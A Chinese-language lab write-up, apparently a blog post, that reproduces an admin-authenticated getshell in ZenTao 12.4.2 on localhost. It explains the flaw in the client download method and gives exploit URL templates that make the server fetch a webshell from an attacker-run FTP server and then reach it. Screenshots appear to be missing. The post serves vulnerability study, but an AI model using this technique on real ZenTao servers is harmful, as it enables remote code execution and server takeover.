禅道12.4.2后台管理员权限Getshell复现

 

 

 

1. 简介
   

   禅道是第一款国产的开源项目管理软件，她的核心管理思想基于敏捷方法scrum，内置了产品管理和项目管理，同时又根据国内研发现状补充了测试管理、计划管理、发布管理、文档管理、事务管理等功能，在一个软件中就可以将软件研发中的需求、任务、bug、用例、计划、发布等要素有序的跟踪管理起来，完整地覆盖了项目管理的核心流程。

2. 漏洞概述
   禅道12.4.2版本存在任意文件下载漏洞，该漏洞是因为client类中download方法中过滤不严谨可以使用ftp达成下载文件的目的。且下载文件存储目录可解析php文件，造成getshell。
3. 影响版本
   禅道≤ 12.4.2
4. 环境搭建
   环境：phpStudy+禅道12.4.2
   

   1. 官网下载禅道12.4.2

      因为我们要调试代码，所以下载源码，不用官方的集成环境，这里我用的是中文版的那个源码。

      https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html

       

       

   2. 源码安装

      

       

       

       

       这里有一项不通过，需要修改配置。在phpstudy里面的PHP扩展及设置修改。
      

       

       

5. 安装成功
   

    

    

6. 漏洞复现
   

   EXP：

   http://127.0.0.1/zentao/client-download-1-<base64 encode webshell download link>-1.html

   http://127.0.0.1/zentao/data/client/1/<download link filename>

   这里需要自己开启一个ftp服务，然后把链接的base64位编码和自己的路径替换一下。
   http://127.0.0.1/zentaopms/www/client-download-1-<base64 encode webshell download link>-1.html